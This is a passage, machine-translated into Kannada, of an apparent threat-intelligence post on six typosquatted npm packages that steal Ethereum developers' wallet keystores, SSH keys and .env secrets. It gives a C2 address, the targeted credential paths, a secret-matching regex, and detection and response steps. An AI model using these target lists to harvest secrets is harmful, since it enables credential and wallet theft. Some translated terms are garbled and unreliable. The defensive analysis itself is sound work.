ಮೊದಲನೆಯದಾಗಿ, C2 ಎಂಬುದು ಡೊಮೇನ್ಗಿಂತ ಕಚ್ಚಾ IPv4 ವಿಳಾಸವಾಗಿದೆ. ಇದು ಡೊಮೇನ್ ನೋಂದಣಿಯ ಅಗತ್ಯವನ್ನು ತೆಗೆದುಹಾಕುತ್ತದೆ ಮತ್ತು ಕೆಲವು ಡೊಮೇನ್-ಆಧಾರಿತ ಪತ್ತೆಹಚ್ಚುವಿಕೆಗಳನ್ನು ತಪ್ಪಿಸುತ್ತದೆ.
ಎರಡನೆಯದಾಗಿ, TLS ಪರಿಶೀಲನೆಯನ್ನು ಇದರೊಂದಿಗೆ ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲಾಗಿದೆ:
rejectUnauthorized: false ಇದು ಮಾಲ್ವೇರ್ಗೆ ಸ್ವಯಂ ಸಹಿ ಮಾಡಿದ ಪ್ರಮಾಣಪತ್ರಗಳು ಸೇರಿದಂತೆ ಯಾವುದೇ ಪ್ರಮಾಣಪತ್ರವನ್ನು ಸ್ವೀಕರಿಸಲು ಅನುಮತಿಸುತ್ತದೆ. ಬೇರೆ ರೀತಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ದಾಳಿಕೋರರು ಮಾನ್ಯವಾದ ಸಾರ್ವಜನಿಕ ಪ್ರಮಾಣಪತ್ರದ ಅಗತ್ಯವಿಲ್ಲದೆಯೇ ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಸಾರಿಗೆಯನ್ನು ಪಡೆಯುತ್ತಾರೆ.
ಮರುಪ್ರಯತ್ನ ತರ್ಕವಿಲ್ಲ ಮತ್ತು ಫಾಲ್ಬ್ಯಾಕ್ ಹೋಸ್ಟ್ ಇಲ್ಲ. ದೋಷಗಳನ್ನು ಮೌನವಾಗಿ ನುಂಗಲಾಗುತ್ತದೆ. C2 ಆಫ್ಲೈನ್ನಲ್ಲಿದ್ದರೆ ಅಥವಾ ತಲುಪಲು ಸಾಧ್ಯವಾಗದಿದ್ದರೆ ಇದು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಶಾಂತವಾಗಿರಿಸುತ್ತದೆ.
ಈ ಅಭಿಯಾನ ಏಕೆ ಮುಖ್ಯವಾಗಿದೆ
ಡೆವಲಪರ್ಗಳನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡು ಹೆಚ್ಚಿನ ದುರುದ್ದೇಶಪೂರಿತ npm ಪ್ಯಾಕೇಜ್ಗಳು ವಿಶಾಲವಾದ ರುಜುವಾತುಗಳನ್ನು ಬೆನ್ನಟ್ಟುತ್ತವೆ: npm ಟೋಕನ್ಗಳು, AWS ಕೀಗಳು, GitHub ಟೋಕನ್ಗಳು, ಅಥವಾ .npmrc ಕಡತಗಳನ್ನು.
ಈ ಅಭಿಯಾನವು ಗುರಿಯನ್ನು ಸಂಕುಚಿತಗೊಳಿಸುತ್ತದೆ.
ಯಂತ್ರವು ಎಥೆರಿಯಮ್ ಅಥವಾ ಸಾಲಿಡಿಟಿ ಡೆವಲಪರ್ಗೆ ಸೇರಿದೆ ಎಂಬುದರ ಚಿಹ್ನೆಗಳನ್ನು ಅದು ಹುಡುಕುತ್ತದೆ. ನಂತರ ಅದು ಆ ಪರಿಸರದಲ್ಲಿ ಮುಖ್ಯವಾದ ಸ್ವತ್ತುಗಳನ್ನು ನಿಖರವಾಗಿ ಎಳೆಯುತ್ತದೆ: ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ಗಳು, ಖಾಸಗಿ ಕೀಗಳು, ಜ್ಞಾಪಕಶಾಸ್ತ್ರ, ನಿಯೋಜಕ ಕೀಗಳು, .env ಫೈಲ್ಗಳು ಮತ್ತು SSH ಕೀಗಳು.
ಇದು ವೆಬ್3 ತಂಡಗಳಿಗೆ ಸಾಮಾನ್ಯ npm ಕಳ್ಳತನಕ್ಕಿಂತ ಹೆಚ್ಚು ಅಪಾಯಕಾರಿ ಅಭಿಯಾನವಾಗಿದೆ.
ಯಶಸ್ವಿ ಸೋಂಕು ಈ ಕೆಳಗಿನವುಗಳನ್ನು ಬಹಿರಂಗಪಡಿಸಬಹುದು:
- ನಿಯೋಜನಾ ತೊಗಲಿನ ಚೀಲಗಳು
- ಸ್ಮಾರ್ಟ್ ಒಪ್ಪಂದ ನಿರ್ವಾಹಕ ಕೀಗಳು
- RPC ಪೂರೈಕೆದಾರರ ಕೀಲಿಗಳು
- ಕ್ಲೌಡ್ ನಿಯೋಜನೆ ರುಜುವಾತುಗಳು
- npm ಪ್ರಕಟಣೆ ಟೋಕನ್ಗಳು
- ಡೆವಲಪರ್ ಅಥವಾ ನಿರ್ಮಾಣ ಮೂಲಸೌಕರ್ಯಕ್ಕೆ SSH ಪ್ರವೇಶ
- ಯೋಜನೆಯ ರಹಸ್ಯಗಳನ್ನು ಸಂಗ್ರಹಿಸಲಾಗಿದೆ
.envಕಡತಗಳನ್ನು - ಫೌಂಡ್ರಿ, ಗೆತ್ ಅಥವಾ ಬ್ರೌನಿಗಾಗಿ ವಾಲೆಟ್ ಕೀಸ್ಟೋರ್ಗಳು
ಪ್ಯಾಕೇಜ್ ಹೆಸರುಗಳು ಸ್ಪಷ್ಟ ಸಾಮಾಜಿಕ ಎಂಜಿನಿಯರಿಂಗ್ ಅನ್ನು ಸಹ ತೋರಿಸುತ್ತವೆ. ಅವು ಪರಿಚಿತ ಪರಿಕರ ಹೆಸರುಗಳ ಮೂಲಕ Web3 ಡೆವಲಪರ್ ಪರಿಸರ ವ್ಯವಸ್ಥೆಯನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಳ್ಳುತ್ತವೆ: viem, hardhat, foundry, evm, ಮತ್ತು web3.
ನಟನಿಗೆ ನಿಜವಾದ ಯೋಜನೆಗಳೊಂದಿಗೆ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವ ಅಗತ್ಯವಿಲ್ಲ. ಅವರಿಗೆ ಸಮಂಜಸವಾದ ಕಂಪ್ಯಾನಿಯನ್ ಪ್ಯಾಕೇಜ್ನಂತೆ ಕಾಣುವದನ್ನು ಸ್ಥಾಪಿಸಲು ಡೆವಲಪರ್ ಮಾತ್ರ ಬೇಕಾಗುತ್ತದೆ.
ರಾಜಿ ಮತ್ತು ಪತ್ತೆ ಸೂಚಕಗಳು
| ಪ್ಯಾಕೇಜ್ಗಳು ಮತ್ತು ಪ್ರಕಾಶಕರು | |
|---|---|
| ಫೀಲ್ಡ್ | ಮೌಲ್ಯ |
| npm ಪ್ರಕಾಶಕರು | ನಮಿಕಾಜೆಸರದ010206 |
| ಪ್ರಕಾಶಕರ ಇಮೇಲ್ | namikazesarada010206@gmail.com |
| ಇಮೇಲ್ ಪರಿಶೀಲಿಸಲಾಗಿದೆ | ಇಲ್ಲ |
| SCM ಪರಿಶೀಲಿಸಲಾಗಿದೆ | ಇಲ್ಲ |
| ಖ್ಯಾತಿ ಅಂಕಗಳು | 1.0 |
| ಪ್ಯಾಕೇಜುಗಳು | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core |
| ಆವೃತ್ತಿಗಳು | ಎಲ್ಲಾ 1.0.0 |
| ಮೂಲ ಭಂಡಾರ | https://github.com/harunosakura030303-maker/evmchain-config |
| ದುರುದ್ದೇಶಪೂರಿತ ಎಂದು ದೃಢಪಡಿಸಲಾಗಿದೆ | ಎಲ್ಲಾ ಆರು ಪ್ಯಾಕೇಜ್ಗಳು |
| ನೆಟ್ವರ್ಕ್ | |
|---|---|
| ಪ್ರಕಾರ | ಮೌಲ್ಯ |
| C2 ಎಂಡ್ಪಾಯಿಂಟ್ | https://76.13.37.80:8443/api/v1/telemetry |
| ಸಿ2 ಐಪಿ | 76.13.37.80 |
| C2 ಪೋರ್ಟ್ | 8443/ಟಿಸಿಪಿ |
| TLS ನಡವಳಿಕೆ | ಅನಧಿಕೃತ ತಿರಸ್ಕರಿಸಿ: ತಪ್ಪು |
| ಪೇಲೋಡ್ ಸ್ಕೀಮಾ | {"ವಿ":2,"ಐವಿ": ,"ಡಿ": ,"ಟಿ": } |
| ಫೈಲ್ಗಳು ಮತ್ತು ಹ್ಯಾಶ್ಗಳು | |
|---|---|
| ಪ್ರಕಾರ | ಮೌಲ್ಯ |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| ಪ್ಯಾಕೇಜ್ ವಿನ್ಯಾಸ | ಪ್ಯಾಕೇಜ್.ಜೆಸನ್, ಸೂಚ್ಯಂಕ.ಜೆಎಸ್, ಟೆಲಿಮೆಟ್ರಿ.ಜೆಎಸ್ |
| ಫೈಲ್ ಎಣಿಕೆ | 3 |
| ಅಂದಾಜು ಒಟ್ಟು ಗಾತ್ರ | 3.4 ಕೆಬಿ |
ಸಕ್ರಿಯಗೊಳಿಸುವಿಕೆ ಸಂಕೇತಗಳು
ಮಾಲ್ವೇರ್ ಈ ಪರಿಸರ ವೇರಿಯಬಲ್ಗಳನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY ಇದು ಇದಕ್ಕಾಗಿಯೂ ಪರಿಶೀಲಿಸುತ್ತದೆ:
~/.foundry/ ಉದ್ದೇಶಿತ ಹೋಸ್ಟ್ ಮಾರ್ಗಗಳು
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development ಸಂಗ್ರಹ ರೆಜೆಕ್ಸ್
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ಪತ್ತೆ ಟಿಪ್ಪಣಿಗಳು
ಸಂಪೂರ್ಣ ನಡವಳಿಕೆಯ ವಿಶ್ಲೇಷಣೆಯ ಅಗತ್ಯವಿಲ್ಲದೆಯೇ ಹಲವಾರು ನಿಯಮಗಳು ಈ ಅಭಿಯಾನವನ್ನು ಸೆರೆಹಿಡಿಯುತ್ತವೆ.
ಮೊದಲು, ಆರು ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ ಹೆಸರುಗಳಿಗಾಗಿ ಲಾಕ್ಫೈಲ್ಗಳನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಿ:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ಯಾವುದೇ ಪಂದ್ಯ package-lock.json, yarn.lock, pnpm-lock.yamlಅಥವಾ node_modules ಇತಿಹಾಸವನ್ನು ಗಂಭೀರ ಘಟನೆ ಎಂದು ಪರಿಗಣಿಸಬೇಕು.
ಎರಡನೆಯದಾಗಿ, ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಮಾರ್ಗಗಳನ್ನು ಓದುವ Node.js ಪ್ರಕ್ರಿಯೆಗಳಿಗಾಗಿ ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಿ:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ ಸಹಾಯಕ ಅವಲಂಬನೆಯಾಗಿ ಆಮದು ಮಾಡಿಕೊಂಡ ಪ್ಯಾಕೇಜ್ಗೆ ಇದು ವಿರಳವಾಗಿ ಕಾನೂನುಬದ್ಧ ನಡವಳಿಕೆಯಾಗಿದೆ. ಹೊರಹೋಗುವ ನೆಟ್ವರ್ಕ್ ಚಟುವಟಿಕೆಯನ್ನು ಅನುಸರಿಸಿದಾಗ ಇದು ವಿಶೇಷವಾಗಿ ಅನುಮಾನಾಸ್ಪದವಾಗಿರುತ್ತದೆ.
ಮೂರನೆಯದಾಗಿ, HTTPS ಸಂಪರ್ಕಗಳನ್ನು ನಿರ್ಬಂಧಿಸಿ ಅಥವಾ ಎಚ್ಚರಿಸಿ:
76.13.37.80:8443 ವಿಶೇಷವಾಗಿ ವಿನಂತಿಯ ಮಾರ್ಗವು ಹೀಗಿರುವಾಗ:
/api/v1/telemetry ನಾಲ್ಕನೆಯದಾಗಿ, ಈ ಗುಣಲಕ್ಷಣಗಳನ್ನು ಸಂಯೋಜಿಸುವ npm ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಹುಡುಕಿ:
- ಹೊಸ ಅಥವಾ ಕಡಿಮೆ ಖ್ಯಾತಿಯ ಪ್ರಕಾಶಕರು
- ಪರಿಶೀಲಿಸದ Gmail ಖಾತೆ
- Web3-ಪಕ್ಕದ ಪ್ಯಾಕೇಜ್ ಹೆಸರು
- ಅರ್ಥಪೂರ್ಣ ಭಂಡಾರ ಇತಿಹಾಸವಿಲ್ಲ.
- ಸಣ್ಣ ಪ್ಯಾಕೇಜ್ ವಿನ್ಯಾಸ
index.jsಅದು ಟೆಲಿಮೆಟ್ರಿ ಅಥವಾ ಸಹಾಯಕ ಫೈಲ್ ಅನ್ನು ಲೋಡ್ ಮಾಡುತ್ತದೆ- ಯಾವುದೇ ರನ್ಟೈಮ್ ಅವಲಂಬನೆಗಳಿಲ್ಲ
- ಸೂಕ್ಷ್ಮ ಪರಿಸರ-ವೇರಿಯಬಲ್ ಸಂಗ್ರಹ
- ವಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಪ್ರವೇಶ
ಈ ಮಾದರಿಯು ಒಂದೇ IOC ಗಿಂತ ಹೆಚ್ಚು ಉಪಯುಕ್ತವಾಗಿದೆ ಏಕೆಂದರೆ ಮುಂದಿನ ಪ್ಯಾಕೇಜ್ IP ವಿಳಾಸವನ್ನು ಬದಲಾಯಿಸಬಹುದು ಆದರೆ ಅದೇ ಗುರಿ ತರ್ಕವನ್ನು ಇಟ್ಟುಕೊಳ್ಳಬಹುದು.
ಹೊಂದಾಣಿಕೆ ಪ್ರತಿಕ್ರಿಯೆ ಪರಿಶೀಲನಾಪಟ್ಟಿ
ಒಬ್ಬ ಡೆವಲಪರ್ ಆರು ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ ಒಂದನ್ನು ಬಳಸಿದ್ದರೆ ಮತ್ತು ಅವರ ಪರಿಸರವು ಸಕ್ರಿಯಗೊಳಿಸುವ ಗೇಟ್ಗೆ ಹೊಂದಿಕೆಯಾಗಿದ್ದರೆ, ಕಾರ್ಯಸ್ಥಳವನ್ನು ರಾಜಿ ಮಾಡಲಾಗಿದೆ ಎಂದು ಪರಿಗಣಿಸಿ.
ಅದು ಫೌಂಡ್ರಿ ಸ್ಥಾಪಿಸಲಾದ ಯಂತ್ರಗಳು, ಪರಿಸರದಲ್ಲಿ ಆಲ್ಕೆಮಿ ಅಥವಾ ಇನ್ಫ್ಯೂರಾ ಕೀಗಳು, ಖಾಸಗಿ ಕೀಗಳು, ಜ್ಞಾಪಕಶಾಸ್ತ್ರ ಅಥವಾ ನಿಯೋಜಕ ಕೀಗಳನ್ನು ಒಳಗೊಂಡಿದೆ.
ಶಿಫಾರಸು ಮಾಡಲಾದ ಪ್ರತಿಕ್ರಿಯೆ:
- ನೆಟ್ವರ್ಕ್ನಿಂದ ಹೋಸ್ಟ್ ಸಂಪರ್ಕ ಕಡಿತಗೊಳಿಸಿ.
- ಸಂರಕ್ಷಿಸಿ
node_modules, ಲಾಕ್ಫೈಲ್ಗಳು, ಶೆಲ್ ಇತಿಹಾಸ ಮತ್ತು ಫೋರೆನ್ಸಿಕ್ಸ್ಗೆ ಸಂಬಂಧಿಸಿದ ಲಾಗ್ಗಳು. - ಪ್ರತಿಯೊಂದು SSH ಕೀಜೋಡಿಯನ್ನು ಕೆಳಗೆ ತಿರುಗಿಸಿ
~/.ssh/. - ಪ್ರತಿ ಕೀಸ್ಟೋರ್ಗೆ ವಾಲೆಟ್ ಕೀಗಳನ್ನು ತಿರುಗಿಸಿ
~/.foundry,~/.ethereum, ಮತ್ತು~/.brownie. - ಹಣವನ್ನು ಹೊಸ ವ್ಯಾಲೆಟ್ಗಳಿಗೆ ಸರಿಸಿ.
- ಸಂಗ್ರಹವಾಗಿರುವ ಪ್ರತಿಯೊಂದು ರಹಸ್ಯವನ್ನು ತಿರುಗಿಸಿ
.env*ಡೆವಲಪರ್ ಕೆಲಸ ಮಾಡಿದ ರೆಪೊಸಿಟರಿಗಳಲ್ಲಿನ ಫೈಲ್ಗಳು. - AWS ಕೀಗಳು, npm ಟೋಕನ್ಗಳು, ನಿಯೋಜಿತ ಟೋಕನ್ಗಳು, API ಕೀಗಳು, ಖಾಸಗಿ ಕೀಗಳು, ಬೀಜಗಳು ಮತ್ತು ಜ್ಞಾಪಕಶಾಸ್ತ್ರಗಳನ್ನು ಒಳಗೊಂಡಂತೆ ಸಂಗ್ರಹದ ನಿಯಮಿತ ಅಭಿವ್ಯಕ್ತಿಗೆ ಹೊಂದಿಕೆಯಾಗುವ ಪರಿಸರ ರಹಸ್ಯಗಳನ್ನು ತಿರುಗಿಸಿ.
- ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಮೊದಲು ಸ್ಥಾಪಿಸಿದಾಗಿನಿಂದ ಕ್ಲೌಡ್, npm, GitHub, RPC ಪೂರೈಕೆದಾರರು ಮತ್ತು ಬ್ಲಾಕ್ಚೈನ್ ಚಟುವಟಿಕೆಯನ್ನು ಆಡಿಟ್ ಮಾಡಿ.
- ಮರುಬಳಕೆ ಮಾಡುವ ಮೊದಲು ಕಾರ್ಯಸ್ಥಳವನ್ನು ಮರು-ಇಮೇಜ್ ಮಾಡಿ.
ರಕ್ಷಕರು ಏನು ತೆಗೆದುಕೊಂಡು ಹೋಗಬೇಕು
ಈ ಅಭಿಯಾನವು ಹೆಚ್ಚಿನ ಮೌಲ್ಯದ ಡೆವಲಪರ್ ಪರಿಸರ ವ್ಯವಸ್ಥೆಗಳ ಸುತ್ತ npm ಟೈಪೊಸ್ಕ್ವಾಟಿಂಗ್ ಹೇಗೆ ವಿಕಸನಗೊಳ್ಳುತ್ತಿದೆ ಎಂಬುದನ್ನು ತೋರಿಸುತ್ತದೆ.
ಆ ನಟನಿಗೆ ಪರಿಶ್ರಮದ ಅಗತ್ಯವಿರಲಿಲ್ಲ. ಅವರಿಗೆ ಗೊಂದಲದ ಅಗತ್ಯವಿರಲಿಲ್ಲ. ಅವರಿಗೆ ಅನುಸ್ಥಾಪನೆಯ ಸಮಯದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯ ಅಗತ್ಯವೂ ಇರಲಿಲ್ಲ.
ಬದಲಾಗಿ, ಅವರು ಮೂರು ವಿಷಯಗಳನ್ನು ಅವಲಂಬಿಸಿದ್ದರು:
- ತೋರಿಕೆಯ Web3 ಪ್ಯಾಕೇಜ್ ಹೆಸರುಗಳು
- ನಿಜವಾದ ಕ್ರಿಪ್ಟೋ-ಅಭಿವೃದ್ಧಿ ಯಂತ್ರಗಳಲ್ಲಿ ಮಾತ್ರ ಸಕ್ರಿಯಗೊಳಿಸುವಿಕೆ
- ಎಥೆರಿಯಮ್ ಡೆವಲಪರ್ಗಳಿಗೆ ಹೆಚ್ಚು ಮುಖ್ಯವಾದ ಫೈಲ್ಗಳು ಮತ್ತು ರಹಸ್ಯಗಳ ನೇರ ಕಳ್ಳತನ
ಅದು ವಿಶಾಲ ಪರಿಶೀಲನೆಯಲ್ಲಿ ಅಭಿಯಾನವನ್ನು ತಪ್ಪಿಸಿಕೊಳ್ಳುವುದನ್ನು ಸುಲಭಗೊಳಿಸುತ್ತದೆ ಮತ್ತು ಸರಿಯಾದ ಪರಿಸರದಲ್ಲಿ ಇಳಿದಾಗ ಅಪಾಯಕಾರಿಯಾಗಿದೆ.
Web3 ತಂಡಗಳಿಗೆ, ಪಾಠ ಸ್ಪಷ್ಟವಾಗಿದೆ: ಅವಲಂಬನೆಯ ಹೆಸರುಗಳನ್ನು ನಿಮ್ಮ ಬೆದರಿಕೆ ಮಾದರಿಯ ಭಾಗವಾಗಿ ಪರಿಗಣಿಸಿ. ನಿರುಪದ್ರವಿ ಸಹಾಯಕನಂತೆ ಕಾಣುವ ಪ್ಯಾಕೇಜ್ ಇನ್ನೂ ವ್ಯಾಲೆಟ್ ರಾಜಿಗೆ ಕಡಿಮೆ ಮಾರ್ಗವಾಗಬಹುದು.
npm ರಿಜಿಸ್ಟ್ರಿಗೆ ವರದಿ ಮಾಡಲಾಗಿದೆ. ಪ್ರಕಾಶಕರ ಖಾತೆ ಮತ್ತು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ತೆಗೆದುಹಾಕಿದಾಗ ನಾವು ಈ ಪೋಸ್ಟ್ ಅನ್ನು ನವೀಕರಿಸುತ್ತೇವೆ.




